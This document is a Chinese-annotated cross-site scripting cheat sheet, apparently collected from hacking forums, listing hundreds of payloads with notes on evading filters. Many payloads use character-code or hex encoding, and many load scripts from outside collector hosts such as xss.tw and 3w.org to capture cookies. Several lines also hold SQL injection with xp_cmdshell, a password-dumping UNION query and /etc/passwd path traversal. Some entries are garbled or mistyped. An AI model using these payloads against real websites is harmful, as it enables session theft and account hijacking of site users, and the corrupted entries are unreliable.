<L onclick=alert(1)>click me</L★最琀;弹出1
<a href="javascrip:alert(document.cookie)"> 用a标签来弹窗
"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"> 在网页过滤了<script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是<script>alert(1)</script> 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))> 遇到过滤<script>无法调用js的时候也可以用类似的代码突破,上面代码是跳转url到javascript:document.write("<script src=xxx></script>") 也就是调用js文件xxx 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);
"><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>弹窗
<iframe src=javascript:with(document)0[body.appendChild(document.createElement(‘script‘)).src="http://url.cn/1.js"]></iframe> iframe收信
<img src=x onerror=appendChild(createElement(‘script‘)).src=‘//js地址‘ /> img标签来收信
<img/**/src=1/**/onerror="with(document)body.appendChild(createElement(‘script‘)).src=‘脚本地址‘" /> 过滤了 <script>标签 以及空格 的解决办法
<img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
回显是<img src="5" onerror=eval("alert(‘xss‘)")></img>
如果你要加载脚本请这样:javascript:document.write(unescape(‘ <script src="脚本地址"></script>‘)); 修改好后 进行HEX加密再放入eval
注:第一段代码:首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码!eval 可以计算 并执行 将上面代码解码后便执行了!
第二段加载脚本的:首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容!
因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex
在这里没有出现 script等危险标签 也没有单引号 所以成功绕过! 过滤了单引号 以及几个危险标签
<script>document.write(String.fromCharCode(在这里写上你的代码));</script> 过滤了等号 单引号 双引号 空格的绕过方法
<img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")> 该过滤的都过滤了
<img src=x onerror=alert(/insight-labs/)>、<p onmouseover=alert(/insight-labs/)>insight-labs、<frameset onload=alert(/insight-labs/)>、<body onload=alert(/insight-labs/)> 事件函数 来弹窗
屏蔽了scaript可以把scaript改成sc%0aript来绕过
"h"+"t"+"t"+"p",绕过对http的过滤
‘"><script>alert(/1/)</script><a="
‘"><script src=http://x.co/xiHv></script><a="
=‘><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(‘XSS‘)%3C/script%3E
‘"><script src="//x.co/xiHv"></script><a="
‘"><script src=//xss.tw/2045></script><a="
‘"><script src=//xss.tw/3058></script><a="
<script src=//xss.tw/3058></script>
" 引号
空格
< <
> >
无src 无等号 无引号
"></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
eval(Dec(‘203041263543203‘,‘2549‘));
<div style="display:none"></div><div style="display:none" t="1" e="style\/<'"></div>"/ \""/<img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
<div id="myxsxxcd" style="color:red;display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}">
<DIV><A></A>
<STYLE><!--a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>}--></style></DIV>
<td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg">
<img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))>
<img src=x onerror=document.body.appendChild(createElement(‘script‘)).src="javascript:alert(/1/)">
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'>
<p><img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="http://img.baidu.com/img/baike/editor/reference.gif" unselectable="on" /></p>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
<div class="qm_left" style="position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=‘//xss.tw/2180‘,sizingMethod=‘scale‘);width:40px;height:40px;">
<span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open(‘/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&‘);"></span>
ECMAScript v3 已从标准中删除了 unescape() 函数,并反对使用它
因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。
通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字)
用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。
解密是unescape(‘%udcdb%uced3%u8d93%u888a%ud58f%u‘);
加密是escape(‘%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ‘);
javascript:document.write(unescape(‘<script src="http://www.xxxx.com/x.js"></script>‘));
document.write(String.fromCharCode(60,12,62)); ==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
"></span><script>document.write(http://baidu.com)</script><span>
[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email]
鼠标单击
<a href="http://www.xyydyt.com" style="color:#143d70; simsun;" onclick="alert(/a/);this.style.behavior=‘url(#default#homepage)‘;this.setHomePage(‘http://www.xyydyt.com‘); return(false);">asdasdsad</a>
<table background=”javascript:alert(/xss/)”></table>’/在表格中插入脚本
<>过滤用\x3cscript. src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e
<script defer="defer">
var a,b;
a="/";
b="/x.co/xiHv";
window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");
</script>
<% string str_a = rrequest.getParameter("a");%>
var a= <%=str_a%>
document.write(a);
<img src="123">
a.jsp/<script>alert(‘Vulnerable‘)</script>
a/
a?<script>alert(‘Vulnerable‘)</script>
"><script>alert('xss')</script>
‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
‘‘;!--"<XSS>=&{()}
<IMG src="javascript:alert(‘XSS‘);">
<IMG src=javascript:alert(‘XSS‘)>
<IMG src=JaVaScRiPt:alert(‘XSS‘)>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert(‘XSS‘)>
<IMG src=javascript:alert(‘XSS‘)>
<IMG src=javascript:alert('XSS')>
<sRCIpt>alert(/123/)</ScRpT>
<P><SPAN class="xmsw" title=防火外墙保温材料 onmouseout="window.location=‘http://www.xfydyt.com‘">了解你的产品和行</SPAN></P>
<div style="background-image:url(<script>alert(document.cookie)</script>)">
<div style="background-image:url(javascript:alert(document.cookie))">
<div style="behaviour:url(‘http://www.how-to-hack.org/exploit.html‘);">
<div style="width:expression(alert(‘x123ss‘));">
<img src="java&#script:alert(/1231/);">
<img src=javascript:alert(/1231/);>
<img src="javascript:alert('XSS')">
<IMG src="jav ascript:alert(‘XaSS‘);">
<IMG src="jav ascript:alert(‘XbSS‘);">
<IMG src="jav ascript:alert(‘XcSS‘);">
"<IMG src=java\0script:alert(\"XSS\")>";‘ > out
<IMG src=" javascript:alert(‘XdSS‘);">
<SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(‘XeSS‘)">
<BODY ONLOAD=alert(‘XgSS‘)>
<IMG DYNSRC="javascript:alert(‘XhSS‘)">
<IMG LOWSRC="javascript:alert(‘XiSS‘)">
<BGSOUND src="javascript:alert(‘XjSS‘);">
<span onclick="javascript:changeFont(2);">
<SPAN class="xmsw" title=dd onmouseout=window.location=‘http://www,xfydyt.com‘>test</span>
<span class="xmsw" title="dd" onmouseout=window.location=‘http://test/test.php?c=‘+document.cookie>test</span>
<SPAN class="xmsw" title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
<br size="&{alert(‘XkSS‘)}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert(‘XlSS‘);">
<IMG src=‘vbscript:msgbox("XmSS")‘>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘XoSS‘);">
<IFR AME src=javascript:alert(‘XSnS‘)></IFRA ME>
<FRAMESET><FRAME src=javascript:alert(‘XpSS‘)></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert(‘XSqS‘)">
<DIV STYLE="background-image: url(javascript:alert(‘X1SS‘))">
<DIV STYLE="behaviour: url(‘http://www.how-to-hack.org/exploit.html‘);">
<DIV STYLE="width: expression(alert(‘X2SS‘));">
<STYLE>@im\port‘\ja\vasc\ript:alert("X3SS")‘;</STYLE>
<IMG STYLE=‘xss:expre\ssion(alert("X5SS"))‘>
<STYLE TYPE="text/javascript">alert(‘X4SS‘);</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(‘X6SS‘)");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(‘X7SS‘)")}</STYLE>
<BASE href="javascript:alert(‘X8SS‘);//">
getURL("javascript:alert(‘X9SS‘)")
a="get";b="URL";c="javascript:";d="alert(‘X10SS‘);";eval(a+b+c+d);
<XML src="javascript:alert(‘X11SS‘);">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(‘X12SS‘);}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src="javascript:alert(‘X13SS‘)"
<!--#exec cmd="/bin/echo ‘<SCRIPT SRC‘"--><!--#exec cmd="/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>;‘"-->
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" ‘‘ src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=‘>‘" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
<DIV STYLE="width:expression(alert(‘anyunix‘));">
<IMG SRC=‘vbscript:msgbox("anyunix")‘>
<STYLE>width:expression(alert(‘anyunix‘));</STYLE>
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>;
(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS‘)>
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS‘)>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert("XSS")>
(6)修正缺陷IMG标签
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S‘)>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S‘)>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java..省略..XSS')>
(11)嵌入式标签,将Javascript分开
<IMG SRC="jav ascript:alert(‘XSS‘);">
(12)嵌入式编码标签,将Javascript分开
<IMG SRC="jav ascript:alert(‘XSS‘);">
(13)嵌入式换行符
<IMG SRC="jav ascript:alert(‘XSS‘);">
(14)嵌入式回车
<IMG SRC="jav ascript:alert(‘XSS‘);">
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC="javascript:alert(‘XSS‘)">
(16)解决限制字符(要求同页面)
<script>z=‘document.‘</script>
<script>z=z+‘write("‘</script>
<script>z=z+‘<script‘</script>
<script>z=z+‘ src=ht‘</script>
<script>z=z+‘tp://ww‘</script>
<script>z=z+‘w.shell‘</script>
<script>z=z+‘.net/1.‘</script>
<script>z=z+‘js></sc‘</script>
<script>z=z+‘ript>")‘</script>
<script>eval_r(z)</script>
(17)空字符
perl -e ‘print "<IMG SRC=java\0script:alert(\"XSS\")>";‘ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";‘ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=" javascript:alert(‘XSS‘);">
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC="javascript:alert(‘XSS‘)"
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)换码过滤的JavaScript
\";alert(‘XSS‘);//
(30)结束Title标签
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31)Input Image
<INPUT SRC="javascript:alert(‘XSS‘);">
(32)BODY Image
<BODY BACKGROUND="javascript:alert(‘XSS‘)">
(33)BODY标签
<BODY(‘XSS‘)>
(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert(‘XSS‘)">
(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert(‘XSS‘)">
(36)BGSOUND
<BGSOUND SRC="javascript:alert(‘XSS‘);">
(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS‘);">
(38)远程样式表
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url("javascript:alert(‘XSS‘)");}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=‘vbscript:msgbox("XSS")‘></STYLE><UL><LI>XSS
(41)META链接url
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(‘XSS‘);">
(42)Iframe
<IFRAME SRC="javascript:alert(‘XSS‘);"></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC="javascript:alert(‘XSS‘);"></FRAMESET>
(44)Table
<TABLE BACKGROUND="javascript:alert(‘XSS‘)">
(45)TD
<TABLE><TD BACKGROUND="javascript:alert(‘XSS‘)">
(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert(‘XSS‘))">
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert(‘XSS‘))">
(48)DIV expression
<DIV STYLE="width: expression_r(alert(‘XSS‘));">
(49)STYLE属性分拆表达
<IMG STYLE="xss:expression_r(alert(‘XSS‘))">
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE="xss:expression_r(alert(‘XSS‘))">
(51)STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert(‘XSS‘)");}</STYLE><A class="XSS"></A>
(52)IMG STYLE方式
exppression(alert("XSS"))‘>
(53)STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>
(54)BASE
<BASE HREF="javascript:alert(‘XSS‘);//">
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a="get";
b="URL(\"";
c="javascript:";
d="alert(‘XSS‘);\")";
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=""></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a=‘>‘" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">‘>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68)URL绕行
<A HREF="http://127.0.0.1/">XSS</A>
(69)URL编码
<A HREF="http://3w.org">XSS</A>
(70)IP十进制
<A HREF="http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八进制
<A HREF="http://0300.0250.0000.0001″>XSS</A>
(73)混合编码
<A HREF="h
tt p://6 6.000146.0×7.147/"">XSS</A>
(74)节省[http:]
<A HREF="//www.google.com/">XSS</A>
(75)节省[www]
<A HREF="http://google.com/">XSS</A>
(76)绝对点绝对DNS
<A HREF="http://www.google.com./">XSS</A>
(77)javascript链接
<A HREF="javascript:document.location=‘http://www.google.com/‘">XSS</A>
Code: <INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
Code: <BODY BACKGROUND="javascript:alert(XSS)">
Code: <BODY ONLOAD=alert(XSS)>
Code: <IMG DYNSRC="javascript:alert(XSS)">
Code: <BGSOUND SRC="javascript:alert(XSS);">
Code: <BR SIZE="&{alert(XSS)}"> (netspace)
Code: <LINK REL="stylesheet" HREF="javascript:alert(XSS);">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code: <STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
Code: <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>;; REL=stylesheet">
Code: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Code: <XSS STYLE="behavior: url(xss.htc);">
Code: <STYLE>li {list-style-image: url("javascript:alert(XSS)");}</STYLE><UL><LI>XSS
Code: <IMG SRC="mocha:[code]"> (netscape only)
Code: <IMG SRC="livescript:[code]"> (netscape only)
Code: <TABLE BACKGROUND="javascript:alert(XSS)">
Code: <IFRAME SRC="javascript:alert(XSS);"></IFRAME>
Code: <TABLE><TD BACKGROUND="javascript:alert(XSS)">
Code: <DIV STYLE="background-image: url(javascript:alert(XSS))">
Code: <BASE HREF="javascript:alert(XSS);//">
US_ASCII编码(库尔特发现)。使用7位ascii编码代替8位,可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。
Code: ?scriptualert(EXSSE)?/scriptu
META协议
Code:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">
对DIV进行unicode编码
Code: <DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
使用expression属性
Code: <DIV STYLE="width: expression(alert(XSS));">
STYLE标签
Code:<STYLE>@importjavasc ipt:alert("XSS");</STYLE>
Code: <STYLE TYPE="text/javascript">alert(XSS);</STYLE>
Code: <STYLE>.XSS{background-image:url("javascript:alert(XSS)");}</STYLE><A class="XSS"></A>
Code: <STYLE type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>
OBJECT标签
Code: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>
EMBED标签
Code: <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Code: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
在flash文件中使用如下代码:
Code: a="get";
b="URL("";
c="javascript:";
d="alert(XSS);")";
eval(a+b+c+d);
XML namespace可以引入行为文件htc但是必须在同一服务器上
Code: <HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Xss.htc: <PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
使用CDATA模糊化的XML数据岛
Cdoe: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(XSS);">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
XML数据岛
Code:<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(XSS)
Black-Hole收集